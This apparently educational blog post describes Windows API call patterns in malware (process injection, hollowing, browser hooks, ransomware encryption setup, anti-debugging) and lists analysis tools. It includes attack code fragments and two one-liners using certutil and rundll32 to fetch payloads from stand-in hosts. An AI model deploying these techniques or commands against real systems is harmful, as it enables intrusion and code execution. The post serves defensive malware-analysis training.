Windows API Malware Patterns - Gr00t's Security Research Lab

# Windows API in Malware: Family Patterns and Analysis >[!Security] >Always analyse malware in a secure, isolated environment like the one we built in our [[Azure Malware Lab Design]] series. The patterns and techniques discussed here are for educational purposes only. Ever wonder why malware analysts get excited when they spot certain API call sequences? It's like finding a criminal's fingerprints at a crime scene - these patterns can give us strong hints about which malware family we might be dealing with and what it's trying to do to our systems. While they're not always definitive - malware authors can and do copy techniques from each other - these API patterns often serve as valuable indicators during analysis. If you're just getting started with Windows APIs, you might want to check out our [[Windows API Basics]] guide first. But if you're ready to dive into how malware authors use (and abuse) these APIs, you're in the right place! ## Understanding Malware API Patterns Malware authors are a bit like chefs - they each have their favourite ingredients (APIs) and recipes (combinations of API calls) that they use to cook up their malicious code. Let's break down some common patterns and see what they tell us about different malware families. ### Process Manipulation Patterns ```cpp // Classic DLL Injection Recipe OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID) VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE) WriteProcessMemory(hProcess, lpAddress, (LPVOID)dllPath, dwSize, NULL) CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, lpAddress, 0, NULL) // Process Hollowing - a more sophisticated dish CreateProcessA(NULL, target, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi) NtUnmapViewOfSection(pi.hProcess, imageBase) VirtualAllocEx(pi.hProcess, imageBase, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) WriteProcessMemory(pi.hProcess, imageBase, newImage, imageSize, NULL) SetThreadContext(pi.hThread, &ctx) ResumeThread(pi.hThread) ``` > 🔍 **Technical Detail**: Process hollowing involves more than just these steps - there's also the tricky business of getting the Process Environment Block (PEB) address (e.g., via the `FS` segment register on x86 or `GS` on x64) and tweaking the `ImageBaseAddress` field. ### Malware Family Signatures Different malware families tend to have their own distinctive cooking styles. Here's what to look out for: #### Banking Trojans (Think TrickBot, Zeus) ```cpp // Their favourite recipe for hooking browser functions // (Note: This is a simplified 5-byte inline hook example. // Hooks can vary in size and complexity.) typedef struct _HOOK_STRUCT { BYTE original[5]; BYTE jump[5]; PVOID function; } HOOK_STRUCT, *PHOOK_STRUCT; // Browser injection - their signature move VirtualProtect(targetFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect) memcpy(hookStruct.original, targetFunction, 5) hookStruct.jump[0] = 0xE9 // JMP instruction *(DWORD*)(&hookStruct.jump[1]) = (DWORD)hookFunction - (DWORD)targetFunction - 5 memcpy(targetFunction, hookStruct.jump, 5) ``` #### Ransomware's Cookbook (WannaCry, Ryuk style) ```cpp // Setting up their encryption kitchen HCRYPTPROV hProv; HCRYPTKEY hKey; DWORD dwMode = CRYPT_MODE_CBC; CryptAcquireContext(&hProv, NULL, MS_ENH_RSA_AES_PROV, PROV_RSA_AES, CRYPT_VERIFYCONTEXT) CryptGenKey(hProv, CALG_AES_256, CRYPT_EXPORTABLE, &hKey) CryptSetKeyParam(hKey, KP_MODE, (BYTE*)&dwMode, 0) // Hunting for files to encrypt WIN32_FIND_DATA findData; HANDLE hFind = FindFirstFile("*.*", &findData); do { HANDLE hFile = CreateFile(findData.cFileName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); // Encryption operations follow... } while(FindNextFile(hFind, &findData)); ``` ### Modern Evasion Techniques Just like cybersecurity professionals, malware authors are constantly upping their game. Here's what we're seeing in modern malware: #### Dynamic API Resolution ```cpp // A sneaky way to hide their intentions typedef HMODULE (WINAPI *pLoadLibraryA)(LPCSTR); typedef FARPROC (WINAPI *pGetProcAddress)(HMODULE, LPCSTR); // Custom GetProcAddress implementation FARPROC GetProcAddressCustom(HMODULE hModule, LPCSTR lpProcName) { // ... clever API resolution logic (e.g., using PEB traversal // to find modules and parse export tables) .. } ``` #### Anti-Analysis Tricks ```cpp // Trying to spot debuggers through timing LARGE_INTEGER frequency, start, end; QueryPerformanceFrequency(&frequency); QueryPerformanceCounter(&start); __debugbreak(); // They time this instruction - debuggers often pause execution here QueryPerformanceCounter(&end); double elapsed = (end.QuadPart - start.QuadPart) * 1000.0 / frequency.QuadPart; if (elapsed > 0.1) { // Debugger spotted! ExitProcess(0); } // Checking if they're in a VM SYSTEM_INFO si; GetSystemInfo(&si); if (si.dwNumberOfProcessors < 2) { // Might be a VM ExitProcess(0); } ``` ## Analysis Methodology When you're hunting for these patterns, here's how to approach it: ### Static Analysis 1. **Import Table Analysis** ```cpp // Looking at what they're importing PIMAGE_IMPORT_DESCRIPTOR importDesc = (PIMAGE_IMPORT_DESCRIPTOR)((BYTE*)moduleBase + ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); // Get address of Import Directory while (importDesc->Name) { // Parse those imports... (e.g., using importDesc->FirstThunk and importDesc->OriginalFirstThunk to find imported functions) importDesc++; } ``` 2. **PE Header Analysis** - Check for suspicious sections (high entropy = possible packing) - Look at section permissions (executable data sections? suspicious!) - Analyse header characteristics ### Dynamic Analysis Configuration Here's how to set up your tools: #### Process Monitor Filters ```plaintext Process Name is "suspicious.exe" Operation is CreateFile Operation is RegSetValue Operation is TCP Send Operation is TCP Receive ``` #### API Monitor Setup ```xml <filter enabled="true"> <api module="kernel32.dll" name="CreateFileA"/> <api module="kernel32.dll" name="WriteFile"/> <api module="advapi32.dll" name="RegSetValueExA"/> </filter> ``` ## Latest Trends The malware world never stands still. Here's what's trending: 1. **Living-off-the-Land (LOLBin) Abuse** ```shell # Abusing legitimate Windows tools certutil.exe -urlcache -split -f http://malicious.com/payload rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("script:http://evil.com/payload") ``` 2. **Direct System Calls** ```nasm ;Bypassing API monitoring (Windows 10 x64) ;Note: Syscall numbers can vary between OS versions) __asm { mov r10, rcx mov eax, 0x3F ;NtCreateFile syscall number syscall ret } ``` ## Essential Analysis Tools Your malware analysis toolkit should include: ### Static Analysis Champions - **[PeStudio](https://www.winitor.com/)**: - Think of this as your initial triage tool. It's brilliant for getting a quick look at suspicious files without actually running them. - The latest version (9.35 as of 2024) has some really neat features for spotting dodgy PE files. - Perfect for when you're thinking "Is this file as suspicious as it looks?" - **[Ghidra](<[https://ghidra-sre.org/](https://ghidra-sre.org/)>)**: For deep-diving into the code - The NSA's gift to reverse engineers (yes, that NSA!) - Absolutely brilliant decompiler that turns machine code into something actually readable - Best part? It's completely free and open-source - **Radare2/Cutter**: - Radare2: [https://rada.re/n/](https://rada.re/n/) - Cutter: [https://cutter.re/](https://cutter.re/) - If you love working from the command line, Radare2 is your new best friend - Not a CLI fan? No worries - Cutter gives you all the same power with a nice GUI Sadly not completely open source, however needs to be mentioned. - **IDA Pro**: [https://hex-rays.com/ida-pro/](https://hex-rays.com/ida-pro/) - The industry standard for years - it's like the Ferrari of disassemblers - Amazing decompiler (though that's a separate licence) - Not cheap (we're talking thousands), but if you're doing this professionally, it's worth every penny - Pro tip: There's a free version of IDA 7.0 floating around legally if you want to try it out - **Binary Ninja**: [https://binary.ninja/](https://binary.ninja/) - The new kid on the block that's making waves - More budget-friendly than IDA Pro (but still not cheap) - Brilliant UI and some really clever features - Perfect middle ground between free tools and IDA Pro ### Dynamic Analysis Heroes - **[Process Monitor](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon)**: Watch those API calls in real-time - [**API Monitor**](https://www.rohitab.com/apimonitor): Get detailed API call information - **[Procmon](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon)**: Your best mate for filesystem and registry operations (yes it's listed twice... it really is that good!) - **[Process Hacker](https://processhacker.sourceforge.io/)**: Open source tooling for processes and system monitoring including advanced memory inspection capabilities. - **[Cuckoo Sandbox](https://cuckoosandbox.org/index.html)**: Automated analysis in a safe environment... or follow our [[Azure Malware Lab Design]] guides. >[!tip] Configure Process Monitor filters to focus on specific API calls - it'll save you from drowning in data! ## Debugging (When You Need to Get Your Hands Dirty) - **x64dbg**: [https://x64dbg.com/](https://x64dbg.com/) - The open-source debugger that gives the commercial ones a run for their money - Fantastic community and loads of useful plugins - Perfect for when you need to step through code line by line ## Network Analysis (Watching the Traffic) - **Wireshark**: [https://www.wireshark.org/](https://www.wireshark.org/) - The absolute king of packet analysis - If it's happening on your network, Wireshark can see it - Yeah, the interface looks a bit overwhelming at first, but you'll learn to love it - **Fiddler**: [https://www.telerik.com/fiddler](https://www.telerik.com/fiddler) - Your go-to tool for web traffic analysis - Brilliant for seeing what malware's trying to download or where it's calling home to - Works with HTTPS traffic too, which is super handy these days ## Extra Resources (Because You Can Never Know Too Much) ### Documentation That Won't Put You to Sleep - Windows API Docs: [https://learn.microsoft.com/en-us/windows/win32/api/](https://learn.microsoft.com/en-us/windows/win32/api/) - Microsoft's official docs - surprisingly readable! - Malware Analysis Tutorials: [https://malwareunicorn.org/workshops/re101.html](https://malwareunicorn.org/workshops/re101.html) - Brilliant for beginners, still useful for pros ## Conclusion Understanding API patterns is crucial for effective malware analysis. While the patterns we've discussed are common, remember that malware is constantly evolving. Always analyse with a critical eye and be ready to spot new variations.